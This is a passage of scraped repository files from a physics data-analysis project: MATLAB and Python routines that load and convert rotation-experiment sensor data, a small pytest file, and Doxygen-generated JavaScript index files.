rotations=find(diff(trig)>(trig(2)-trig(1))*1.1,1);\nend\nmtrig=[];\nsdP=[]; pos=[]; stat=[];\nsensor=[]; sensorNames=[];\nif isdir( fullfile(data_dir, ['SP_motor ',timestamp,' Bundle']) )\n cd( fullfile(data_dir, ['SP_motor ',timestamp,' Bundle']) );\n trigfiles=dir('*triggers*.txt');\n posfiles=dir('*positions*.bin');\n sensfiles=dir('*sensors*.bin');\n for i=1:length(trigfiles)\n mtrig=[mtrig;load(trigfiles(i).name)];\n end\n for i=1:length(posfiles)\n fid=fopen(posfiles(i).name);\n sdP=[sdP;fread(fid,'float64',8)];\n fseek(fid,0,'bof');\n data=fread(fid,'int32=>int32');\n data2=reshape(data,4,length(data)/4)';\n pos=[pos;data2(:,3)];\n stat=[stat;data2(:,4)];\n fclose(fid);\n end\n for i=1:length(sensfiles)\n end\nend\nif isempty(trig)\n trig=mtrig;\nend\nif rem(length(trig),rotations)\n disp(['There are ',num2str(rem(length(trig),rotations)),' extra triggers!'])\nend\n\n% Check North positions using Apparatus Position in Relaxed data \nif ~isempty(sdRe) & (mean(sigRe(:,19))>1)\n checkNorth(sdRe,sigRe,trig(1:find(trig<max(sdRe),1,'last')));\nend\n \nzerodata=GetZeroDataSP(timestamp);\ncd(start_dir)\nend\n\n" }, { "alpha_fraction": 0.4693877696990967, "alphanum_fraction": 0.7329931855201721, "avg_line_length": 57.900001525878906, "blob_id": "51f1b71b5cf69f8d8b59125c15c81cd7fc3f02d6", "content_id": "1b898959daf917947b6bea8cc246dd19cb7530b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 588, "license_type": "no_license", "max_line_length": 89, "num_lines": 10, "path": "/html/openCPT_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var openCPT_8py =\n[\n [ \"loadApparatusFiles\", \"openCPT_8py.html#a8d2cf2d1cdb625fa3ea7d0ec4e7af575\", null ],\n [ \"openFile\", \"openCPT_8py.html#a123c419a688aefb0d6d482eca7512d36\", null ],\n [ \"base_dir\", \"openCPT_8py.html#a6195f6525b22b29221384f9235fe1062\", null ],\n [ \"dat\", \"openCPT_8py.html#a3e5077d300b3260fd9aa1487e0e15a3e\", null ],\n [ \"ddir\", \"openCPT_8py.html#a629d9addea1bbee10544941d7c301ba8\", null ],\n [ \"filepath\", \"openCPT_8py.html#ad49f00cb69a927479558926f2158898f\", null ],\n [ \"template_regex\", \"openCPT_8py.html#a87910852db48cafc314ea9372f00a401\", null ]\n];" }, { "alpha_fraction": 0.47975459694862366, "alphanum_fraction": 0.7325153350830078, "avg_line_length": 61.769229888916016, "blob_id": "b9b24377c38529f3920ec4076239c09594bb285b", "content_id": "e2da9481e803d911f93aacaa13dff809b27bb30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 815, "license_type": "no_license", "max_line_length": 81, "num_lines": 13, "path": "/html/openMotor_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var openMotor_8py =\n[\n [ \"loadAbin\", \"openMotor_8py.html#a04420d495757844bca7113b696a2cb1d\", null ],\n [ \"loadBins\", \"openMotor_8py.html#a67f554beaac0864d301fab58bf86397b\", null ],\n [ \"dat\", \"openMotor_8py.html#aba6f1fba127e2142e12df0163a37f98c\", null ],\n [ \"dat2\", \"openMotor_8py.html#a7e71c31c6f2be1f7dd4c5818fbc3b12e\", null ],\n [ \"dat3\", \"openMotor_8py.html#a7e9dd8e353fa85c7c0ecdda03da8d64e\", null ],\n [ \"ddir\", \"openMotor_8py.html#ab3fcb2684f3321af9bd6715fa1c12675\", null ],\n [ \"ddir2\", \"openMotor_8py.html#a7845f46665131b51ba25ba3adfaf4958\", null ],\n [ \"fname\", \"openMotor_8py.html#a1ca6afbef052898575edbdf81a19cce4\", null ],\n [ \"fname2\", \"openMotor_8py.html#ab3194f8b875a45048365db97cf0d0fd0\", null ],\n [ \"fpath\", \"openMotor_8py.html#aa622e663d644f1b366ed96d4f2b34cf2\", null ]\n];" }, { "alpha_fraction": 0.6016949415206909, "alphanum_fraction": 0.6016949415206909, "avg_line_length": 22.799999237060547, "blob_id": "badcdb8d0ae8793b4333b149eaefef6cec81dd49", "content_id": "59af953ef4edab8e4032228af14a8a12f68f6d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 118, "license_type": "no_license", "max_line_length": 54, "num_lines": 5, "path": "/html/annotated.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var annotated =\n[\n [ \"repo\", \"namespacerepo.html\", \"namespacerepo\" ],\n [ \"object\", \"classobject.html\", null ]\n];" }, { "alpha_fraction": 0.5088235139846802, "alphanum_fraction": 0.5529412031173706, "avg_line_length": 41.5, "blob_id": "98997773d8a07ec315dbc7361da14351b869ade2", "content_id": "99bd690d74bfa801b0fe2b0908cf676e0b2741c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 340, "license_type": "no_license", "max_line_length": 69, "num_lines": 8, "path": "/html/search/files_5.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['scrap_2epy',['scrap.py',['../scrap_8py.html',1,'']]],\n ['sdtime_2epy',['sdtime.py',['../sdtime_8py.html',1,'']]],\n ['spdataset_2epy',['SPDataSet.py',['../SPDataSet_8py.html',1,'']]],\n ['spfuncs_2epy',['SPfuncs.py',['../SPfuncs_8py.html',1,'']]],\n ['spgraphs_2epy',['SPgraphs.py',['../SPgraphs_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.4960170090198517, "alphanum_fraction": 0.7488051056861877, "avg_line_length": 74.36000061035156, "blob_id": "eb1e2221101d1a44d78b3860f3b9f35153ae98e4", "content_id": "594e92f7d6d4f1e0243a581e2f59132c68e09865", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1883, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/html/loadSPFiles_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var loadSPFiles_8py =\n[\n [ \"getAllSPSensor\", \"loadSPFiles_8py.html#ad96607a97fb1364b1b8f5a96a6537818\", null ],\n [ \"getAllTimeStamps\", \"loadSPFiles_8py.html#a1a641072729c4056f58d2f36926b21d1\", null ],\n [ \"getSpinningDataNames\", \"loadSPFiles_8py.html#ad67a85b681c64920ca3d127dcbb8693a\", null ],\n [ \"loadABin\", \"loadSPFiles_8py.html#a48f328dcf32e16ad58677599d39be6a1\", null ],\n [ \"loadBins\", \"loadSPFiles_8py.html#af4f5d276f8094f09b7f23a7e43031b4b\", null ],\n [ \"loadSet\", \"loadSPFiles_8py.html#ac05316301b88456778eaedde597c8ed5\", null ],\n [ \"loadSetInfo\", \"loadSPFiles_8py.html#a94905f8c986f1a826f5e14c6c271d3bc\", null ],\n [ \"loadZeroFile\", \"loadSPFiles_8py.html#aa6876f5f9096cba233794dd03f719de3\", null ],\n [ \"writeSetInfo\", \"loadSPFiles_8py.html#a7a17d807e31989fac9962e7eb5fa3de5\", null ],\n [ \"dat\", \"loadSPFiles_8py.html#a83183382a5277a75ee1031f6ef284691\", null ],\n [ \"dat2\", \"loadSPFiles_8py.html#aed6d44730b91f4104569281ef51b335d\", null ],\n [ \"dat3\", \"loadSPFiles_8py.html#a450ab2273d44a0e76443c6e31b162908\", null ],\n [ \"dat_f\", \"loadSPFiles_8py.html#a8966ac451acc4e186f9a8c9d299da497\", null ],\n [ \"ddir\", \"loadSPFiles_8py.html#a65abcc2d7333a2e99d3d3376b616f959\", null ],\n [ \"ddir2\", \"loadSPFiles_8py.html#a39efcdddf61ee790cdf9c4dfbd9e7080\", null ],\n [ \"fname\", \"loadSPFiles_8py.html#acfe87f91d2373c3c41bf59a6024b8a94\", null ],\n [ \"fname2\", \"loadSPFiles_8py.html#a9058f0ead0c926f493bb7f6ae52a49ea\", null ],\n [ \"fname_f\", \"loadSPFiles_8py.html#af897386d87d4d72567fb337653aa3105\", null ],\n [ \"fpath\", \"loadSPFiles_8py.html#a8ffbf3fed92bc26b4248caebb30ade38\", null ],\n [ \"fpath_f\", \"loadSPFiles_8py.html#a931d7ee8b1015ac25cbca6eee1f77bea\", null ],\n [ \"mediumNames\", \"loadSPFiles_8py.html#af4aa2bb0015793d7b7e493e4aa4f4b8c\", null ],\n [ \"relaxedNames\", \"loadSPFiles_8py.html#a92ba966a3b7423fd4d0c7874d3f92e71\", null ]\n];" }, { "alpha_fraction": 0.5129368901252747, "alphanum_fraction": 0.7476168870925903, "avg_line_length": 77.71428680419922, "blob_id": "13991af4decadeeefeaaac147d313d4048ea35a0", "content_id": "1ce0444a4fe81e164abff24f7926fcc43ee1f162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 175, "num_lines": 28, "path": "/html/SPDataSet_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPDataSet_8py =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet\" ],\n [ \"checkDSUnc\", \"SPDataSet_8py.html#af6b0d8ee29678751051a0b15362f9949\", null ],\n [ \"divide_args\", \"SPDataSet_8py.html#a9d0e07e3e1f4360be4f8c59927abe142\", null ],\n [ \"divide_args_memo\", \"SPDataSet_8py.html#a296fa19993c2ac2fa6db975b8b0f6b88\", null ],\n [ \"genSeqFiltPol\", \"SPDataSet_8py.html#a5a94fa78adaa1ce53cae1e69c7a10c1f\", null ],\n [ \"seqFiltFunc2Axes\", \"SPDataSet_8py.html#aae98530dd28697279534ad7dd042acd8\", null ],\n [ \"seqFiltFuncAngle\", \"SPDataSet_8py.html#aa23a4db7857d6d485ae098e21e29cf59\", null ],\n [ \"seqFiltFuncAxis\", \"SPDataSet_8py.html#acf5db24745ff3b8a02816869e9b10482\", null ],\n [ \"seqFiltFuncAxisInterleave\", \"SPDataSet_8py.html#aee5e268a39b4f3d7d26b8cd8c2eb0dce\", null ],\n [ \"seqFiltFuncInterleave\", \"SPDataSet_8py.html#ae9bed330120419db29ade2d021ca34d7\", null ],\n [ \"seqFiltFuncSlc\", \"SPDataSet_8py.html#abc13a280637f719ae917c9f2cf2d9d47\", null ],\n [ \"seqFiltFuncTime\", \"SPDataSet_8py.html#ac07feedd7af03661a0925bdec0d1f1fe\", null ],\n [ \"testDS\", \"SPDataSet_8py.html#ab3e94a5db004f2a1cbe3b89005731d7c\", null ],\n [ \"testDS2\", \"SPDataSet_8py.html#ae343b1ec862928d74ae9f6e140008b0d\", null ],\n [ \"d\", \"SPDataSet_8py.html#ae71666498d0f08a9d2c39f65c8be15e1\", null ],\n [ \"ds\", \"SPDataSet_8py.html#a9dcba74d2fb20a6a41c191302ec5136b\", null ],\n [ \"errs\", \"SPDataSet_8py.html#a3c7145cc42e7ec16a596f5996a8e70e2\", null ],\n [ \"rsBase\", \"SPDataSet_8py.html#a6b49ba99ee674be07d78e57e0d6a4506\", null ],\n [ \"rsL\", \"SPDataSet_8py.html#a794711a619d88291abbe1c9c29396b5b\", null ],\n [ \"sAmp\", \"SPDataSet_8py.html#a7ef84c87edaf55c60c75aa4a6b63fabf\", null ],\n [ \"sidAmpL\", \"SPDataSet_8py.html#aaa1cf30f24f4635798c2ac9ab8cb991f\", null ],\n [ \"st\", \"SPDataSet_8py.html#aa809f797a727977783e89201eb7515ba\", null ],\n [ \"timestampL\", \"SPDataSet_8py.html#ab977d64bf78ed1ce32101398d66e2673\", null ],\n [ \"ts\", \"SPDataSet_8py.html#a2e421078d46e1d8f3b0c2d7c8211e1a2\", null ],\n [ \"ys\", \"SPDataSet_8py.html#af4556d66bac96baab9aed887e66ce083\", null ]\n];" }, { "alpha_fraction": 0.6150000095367432, "alphanum_fraction": 0.7674999833106995, "avg_line_length": 79, "blob_id": "c4b0a077f089b704d1862db5fac9823ba3c6fd75", "content_id": "a743ca72e7402ab68ae67c71559cbbf083b5d32a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 400, "license_type": "no_license", "max_line_length": 197, "num_lines": 5, "path": "/html/search/variables_6.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['mediumnames',['mediumNames',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html#af4aa2bb0015793d7b7e493e4aa4f4b8c',1,'repo::programs::pythonpackages::pr::loadSPFiles']]],\n ['mtrig',['mtrig',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html#a98628f2f931f1936c89b4f2c90610736',1,'repo::programs::pythonpackages::pr::getSPdata']]]\n];\n" }, { "alpha_fraction": 0.5666666626930237, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 21.5, "blob_id": "4f9e3e76686bce344ce6d6b0c3404afb20e6a75f", "content_id": "718042a29e6ed4c9e2c9eec71557dffb7dec0114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 90, "license_type": "no_license", "max_line_length": 68, "num_lines": 4, "path": "/html/search/files_2.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['getspdata_2epy',['getSPdata.py',['../getSPdata_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.624365508556366, "alphanum_fraction": 0.7639594078063965, "avg_line_length": 77.80000305175781, "blob_id": "825fd55a97b6f1bf8b010bd07bffb7a12a670511", "content_id": "c1eda7e2483d8f554be94178890674617ca6bc49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 394, "license_type": "no_license", "max_line_length": 186, "num_lines": 5, "path": "/html/search/variables_8.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['pointdata',['PointData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a1ffb0a48d6d36a1260a65e82c4604ce2',1,'repo::programs::pythonpackages::pr::SPfuncs']]],\n ['posfiles',['posfiles',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42',1,'repo::programs::pythonpackages::pr::getSPdata']]]\n];\n" }, { "alpha_fraction": 0.6990991234779358, "alphanum_fraction": 0.7297297120094299, "avg_line_length": 31.58823585510254, "blob_id": "0972d3ac69c11200be3b5719e8b33125af7c42da", "content_id": "cd7db5e08cbd077a1d54d363ff7bb16663249e85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1110, "license_type": "no_license", "max_line_length": 120, "num_lines": 34, "path": "/test_SPfuncs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import SPfuncs as spf\nimport SPDataSet as sd\nimport pytest\nfrom matplotlib import *\n\n\[email protected]\ndef fake_data_stop_start_4dirs():\n rSpec=spf.RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=90)\n return sd.testDS(rSpec)\n\[email protected]\ndef fake_data_stop_start_2dirs():\n rSpec= spf.RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=0)\n return sd.testDS(rSpec)\n\[email protected]\ndef fake_data_continuous():\n ds=sd.SPDataSet('5410.04')\n rAmp=ds.rawData()\n rAmpAdded=spf.addFakeData(rAmp, rotationRate=ds.set_info['rotationRate'], amp=20, bBlankOriginalData=True, phi=pi/5)\n ds.fastD=rAmpAdded\n return ds\n #ds=sd.SPDataSet('test_test', preloadDict={'fastD': [s, sig, 'sig']})\n #need to put something ehre\n\ndef test_continuous_fitting(fake_data_continuous):\n contData=fake_data_continuous\n print(contData.sidAmp(subtractHarmsL=[]))\n\ndef test_cutAmp(fake_data_stop_start_4dirs):\n madeData=fake_data_stop_start_4dirs\n cA=madeData.cutAmp()\n print(cA.sig.shape)\n\n\n" }, { "alpha_fraction": 0.5731147527694702, "alphanum_fraction": 0.580983579158783, "avg_line_length": 33.65909194946289, "blob_id": "ba6505ca2773d9d46429e302ae8b64dfc4256828", "content_id": "09e6003bff18d2a11d4da7ff04a3e1320a29ae28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1525, "license_type": "no_license", "max_line_length": 90, "num_lines": 44, "path": "/convert.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import os\nimport re\n\ndef allDirsSpmeta2Npmeta(base_dir=os.getenv('SP_DATA_DIR')):\n ap_dir_regex=re.compile('.*SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle.*')\n mo_dir_regex=re.compile('.*SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle.*')\n\n it=os.walk(base_dir)\n for D in it:\n files=D[2]\n metaFiles=[fn for fn in files if fn.endswith(\".meta\") or fn.endswith('.meta.txt')]\n for metaFile in metaFiles:\n fpath=os.path.join(D[0], metaFile)\n if ap_dir_regex.match(D[0]):\n spmeta2npmeta(fpath, 'apparatus')\n #if mo_dir_regex.match(D[0]):\n # spmeta2npmeta(fpath, 'motor')\n\ndef spmeta2npmeta(filePath, style=None):\n \"\"\"Style can be 'apparatus' or 'motor'\n \"\"\"\n if style is None:\n motorI=filePath.rfind('motor')\n apparatusI=filePath.rfind('aparatus')\n if motorI==apparatusI:\n raise ValueError(\"Don't know what kind of meta file {0} is.\".format(filePath))\n else:\n style = 'motor' if motorI>apparatusI else 'apparatus'\n\n lines=open(filePath).readlines()\n if style=='apparatus':\n endian='>'\n elif style=='motor':\n endian='<'\n else:\n raise NotImplementedError(\"Don't know what style '{}' is\".format(style))\n output= ['{}, {}f8\\r\\n'.format(lines.pop(0).strip(), endian)]\n output+= ['{}, {}f4\\r\\n'.format(line.strip(), endian) for line in lines]\n\n\n ind=filePath.rfind('.meta')\n outPath=filePath[:ind] + '.npmeta'\n\n open(outPath, 'w').writelines(output)\n" }, { "alpha_fraction": 0.6127451062202454, "alphanum_fraction": 0.7549019455909729, "avg_line_length": 50, "blob_id": "884200c01d36210df21025799d895e20276d733a", "content_id": "920fcb010a1577aa39d7940cadb9f12d59b1c98d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 204, "license_type": "no_license", "max_line_length": 182, "num_lines": 4, "path": "/html/search/functions_b.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['openfile',['openFile',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html#a123c419a688aefb0d6d482eca7512d36',1,'repo::programs::pythonpackages::pr::openCPT']]]\n];\n" }, { "alpha_fraction": 0.42585551738739014, "alphanum_fraction": 0.7731305360794067, "avg_line_length": 52.79545593261719, "blob_id": "55df586574872e7c2f7ff326a1bfb7e116e7c858", "content_id": "8af0c71590257de85d3469174d586ab963ee3078", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2367, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/html/navtreeindex1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var NAVTREEINDEX1 =\n{\n\"openCPT_8py.html#a8d2cf2d1cdb625fa3ea7d0ec4e7af575\":[2,0,4,0],\n\"openCPT_8py.html#ad49f00cb69a927479558926f2158898f\":[2,0,4,5],\n\"openCPT_8py_source.html\":[2,0,4],\n\"openMotor_8py.html\":[2,0,5],\n\"openMotor_8py.html#a04420d495757844bca7113b696a2cb1d\":[2,0,5,0],\n\"openMotor_8py.html#a1ca6afbef052898575edbdf81a19cce4\":[2,0,5,7],\n\"openMotor_8py.html#a67f554beaac0864d301fab58bf86397b\":[2,0,5,1],\n\"openMotor_8py.html#a7845f46665131b51ba25ba3adfaf4958\":[2,0,5,6],\n\"openMotor_8py.html#a7e71c31c6f2be1f7dd4c5818fbc3b12e\":[2,0,5,3],\n\"openMotor_8py.html#a7e9dd8e353fa85c7c0ecdda03da8d64e\":[2,0,5,4],\n\"openMotor_8py.html#aa622e663d644f1b366ed96d4f2b34cf2\":[2,0,5,9],\n\"openMotor_8py.html#ab3194f8b875a45048365db97cf0d0fd0\":[2,0,5,8],\n\"openMotor_8py.html#ab3fcb2684f3321af9bd6715fa1c12675\":[2,0,5,5],\n\"openMotor_8py.html#aba6f1fba127e2142e12df0163a37f98c\":[2,0,5,2],\n\"openMotor_8py_source.html\":[2,0,5],\n\"pages.html\":[],\n\"scrap_8py.html\":[2,0,6],\n\"scrap_8py.html#aceae244c0ee91c8c30885ebb02f12c7e\":[2,0,6,0],\n\"scrap_8py_source.html\":[2,0,6],\n\"sdtime_8py.html\":[2,0,7],\n\"sdtime_8py.html#a5247b0c3e822a26482ae1a8d008b2ec6\":[2,0,7,6],\n\"sdtime_8py.html#a59ed699fb07f9e8b979643c5b26e3797\":[2,0,7,2],\n\"sdtime_8py.html#a5d2548fae8d4ed6901f999ff428401f4\":[2,0,7,0],\n\"sdtime_8py.html#a923e8ccb4500449396bcb1ad3435f968\":[2,0,7,5],\n\"sdtime_8py.html#a9988d76304d783450b792ae158a393e3\":[2,0,7,1],\n\"sdtime_8py.html#a9c31dc1e910e733dd210a93a75cc56b6\":[2,0,7,8],\n\"sdtime_8py.html#abe29426e8a972325a35a61402a87f188\":[2,0,7,10],\n\"sdtime_8py.html#ac3c7ee3324f1c4723a245f4ddf08cd41\":[2,0,7,9],\n\"sdtime_8py.html#ac9d3c2155d402d7c140fe3247e1f5722\":[2,0,7,11],\n\"sdtime_8py.html#ace685a49213778d5d1d332877d6aba88\":[2,0,7,4],\n\"sdtime_8py.html#ad0dcc84eadafdd803d57e73ef2c6e4a2\":[2,0,7,12],\n\"sdtime_8py.html#ad97ec56a6ba609ebcc68f1734ec3d8d5\":[2,0,7,7],\n\"sdtime_8py.html#adda3c804411530cc0adb21939874cffa\":[2,0,7,3],\n\"sdtime_8py_source.html\":[2,0,7],\n\"test__SPfuncs_8py.html\":[2,0,11],\n\"test__SPfuncs_8py.html#a287834089412b429481b6b2b90e2d6bf\":[2,0,11,4],\n\"test__SPfuncs_8py.html#a590b9f06cd4d860f79e97e27c86548ed\":[2,0,11,0],\n\"test__SPfuncs_8py.html#a5b95fcf3c92f76fce1b2bf36daa02403\":[2,0,11,1],\n\"test__SPfuncs_8py.html#a5faeabf3b186e4e18ec4ee66a1111342\":[2,0,11,2],\n\"test__SPfuncs_8py.html#af18588089ac02705cb7205aec7430241\":[2,0,11,3],\n\"test__SPfuncs_8py_source.html\":[2,0,11]\n};\n" }, { "alpha_fraction": 0.6648648381233215, "alphanum_fraction": 0.7243243455886841, "avg_line_length": 45.25, "blob_id": "f33d98a3c30b50e5415ed9e9da183fd73d1fd354", "content_id": "f591eed753ad995bd65d4c94c6b29aa797f2ad86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 185, "license_type": "no_license", "max_line_length": 163, "num_lines": 4, "path": "/html/search/classes_1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['spdataset',['SPDataSet',['../classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html',1,'repo::programs::pythonpackages::pr::SPDataSet']]]\n];\n" }, { "alpha_fraction": 0.5641109347343445, "alphanum_fraction": 0.5933417081832886, "avg_line_length": 42.806251525878906, "blob_id": "2911de96051c1d4ece7444823ce51581f464aa30", "content_id": "47619dd3076aa7867532a4748223e9659cb3f7fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64521, "license_type": "no_license", "max_line_length": 262, "num_lines": 1440, "path": "/SPfuncs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"Useful functions for processing the SP data. Hopefully some are generic enough to be used elsewhere too.\r\n\r\n\"\"\"\r\nfrom __future__ import division\r\nfrom pylab import *\r\nimport matplotlib\r\nfrom matplotlib.gridspec import GridSpec, GridSpecFromSubplotSpec\r\nimport numpy as np\r\nfrom scipy import stats\r\nfrom copy import deepcopy\r\nimport pdb\r\nfrom collections import namedtuple\r\nfrom scipy.optimize import curve_fit\r\nfrom scipy.ndimage import convolve1d\r\nimport os\r\nfrom itertools import count\r\nimport re\r\nimport MT, MF\r\nfrom MT import nonnan, cached_property, nancurve_fit, figDontReplace, running_median_insort, vprint\r\nfrom scipy import random\r\nfrom scipy.signal import windows\r\nfrom statsmodels import api as sm\r\n#from SPDataSet import SPDataSet\r\n\r\nbTest=False\r\n\r\ndef secs2sd(secs):\r\n return secs/23.9344696/3600;\r\ndef sd2secs(sd):\r\n return sd*23.9344696*3600;\r\n\r\nWindow =namedtuple('Window', ['duration', 'offset'])\r\nRotationSpec=namedtuple('RotationSpec', ['startingAngle', 'delay', 'interval', 'rotAngles', 'extraRotAngle', 'numRotations']);\r\nRawData=namedtuple('RawData', ['t', 'sig'])\r\nPointData=namedtuple('PointData', ['t', 'sig', 'err', 'chi2', 'theta' ])\r\nCorrelationData=namedtuple('CorrelationData', ['t', 'sig', 'err', 'chi2', 'theta'])\r\nSiderealFitData=namedtuple('SiderealFitData', ['t', 'sig', 'err', 'chi2', 'sidTheta','labTheta', 'meta'])\r\nLabSetData=namedtuple('LabSetData', ['t', 'sig', 'err', 'chi2', 'labTheta'])\r\n\r\n\r\n\r\ndef getRotationsFromRSpec(rSpec, numReps=1):\r\n if not iterable(rSpec.rotAngles):\r\n rotAngles=[rSpec.rotAngles]\r\n else:\r\n rotAngles=rSpec.rotAngles\r\n rotationSequence=array( [rSpec.extraRotAngle]+ [rotAngles[k] for k in arange(rSpec.numRotations-1, dtype='i4')%len(rotAngles)])\r\n allRotations=tile(rotationSequence, numReps)\r\n return allRotations\r\ndef getAnglesFromRSpec(rSpec, numReps=1):\r\n \"\"\" Return angles for the sequence defined by @rSpec, repeated @numReps times.\r\n Angles are that /before/ each rotation, including before the extraRotation\r\n\r\n \"\"\"\r\n #Logic here is a little screwy. We start with extraRotAngle then subtract it from everything\r\n # Also remember, following the logic on spin-doctor we only do the main rotation N-1 times, the last one being the 'extraRotation'\r\n \r\n allRotations=getRotationsFromRSpec(rSpec, numReps)\r\n allAngles= rSpec.startingAngle-rSpec.extraRotAngle + cumsum(allRotations)\r\n allAngles=allAngles.reshape((numReps, rSpec.numRotations))\r\n #allAngles=allAngles[:,:-1]\r\n #allAngles=tile(angles, (numReps,1) )+arange(numReps)[:,newaxis]*rSpec.extraRotAngle\r\n return allAngles\r\n\r\ndef makeTriggers(sd,rSpec, seqStartTimes=None, bIncludeExtraRot=True, gapBetween=False):\r\n \"\"\" Construct a set of triggers by analysing the timing for the\r\n signal.\r\n \"\"\"\r\n sdDiff=np.diff(sd); \r\n meanDt=np.mean(sdDiff) # Mean difference between 1 point and the next (should be 0.02s ish)\r\n meanDt=np.median(sdDiff) # (Maybe using the median will be more robust?)\r\n \r\n if gapBetween:\r\n vprint(\"You probably shouldn't be using the gapBetween argument to makeTriggers\")\r\n gapBetween=secs2sd(gapBetween)\r\n dataTime=secs2sd(rSpec.numRotations*rSpec.interval+rSpec.delay)\r\n seqStartTimes=arange(sd[0],sd[-1]-dataTime, (dataTime +gapBetween) )\r\n\r\n if seqStartTimes is None:\r\n mask=np.hstack([[True], sdDiff>8*meanDt]) #Make a mask array for where the difference is much greater than the average\r\n #The above should perhaps not start with at true, but a false? I imagine we start recording data BEFORE we send the first trigger, not the other-way around?\r\n\r\n seqStartTimes=sd[mask]; #We'll assume those points are where each sequence of rotations starts\r\n if len(seqStartTimes)==1:\r\n vprint(\"Maybe there's no gaps in the sequence? makeTriggers is only returning one set of triggers\")\r\n \r\n Ntrigs = rSpec.numRotations-1\r\n if bIncludeExtraRot:\r\n Ntrigs+=1\r\n group=secs2sd(np.arange(Ntrigs)*rSpec.interval+rSpec.delay); #A group is a group of triggers for 1 sequence\r\n\r\n trigTimes=[group+seqStartTimes[0]]; #Trig will be the list of all triggers which we slowly build up.\r\n for i in range(1, seqStartTimes.size): #(this could be easily vectorized, as the size of trigTimes is known in advance)\r\n if trigTimes[-1][-1]<seqStartTimes[i]:\r\n trigTimes.append(group+seqStartTimes[i])\r\n\r\n #angles=getAnglesFromRSpec(rSpec, seqStartTimes.size)#, bIncludeExtraRot=bIncludeExtraRot)\r\n return np.array(trigTimes)#, np.array(angles)\r\n\r\ndef sliceSorted(t, t_0, t_end=None, delta_t=None):\r\n \"\"\" Cut up the times @t into sections that start at t_0 and and at t_end OR t_0 + delta_t if they're all the same.\r\n\r\n Returns a list of index arrays with length t_0.size\r\n \"\"\"\r\n startIs=t.searchsorted(t_0.ravel()); #ravel here because x0 can be multi-d\r\n if t_end is not None:\r\n endIs = t.searchsorted(t_end.ravel())\r\n if delta_t is not None:\r\n raise Exception(\"should have t_end OR delta_t, not both!\")\r\n elif delta_t:\r\n endIs = t.searchsorted(t_0.ravel()+delta_t)\r\n\r\n startIs=startIs[endIs<t.size] #Throw out cuts where the end index is out of range\r\n endIs=endIs[:startIs.size]\r\n\r\n if t_0.ndim>1:\r\n #If we lose some part so we have an incomplete sequence, we'll dump them.\r\n Norphans=startIs.size%t_0.shape[-1] #this is only general for 2d- need rethinking for more dimensions\r\n if Norphans>0:\r\n startIs=startIs[:-Norphans]\r\n 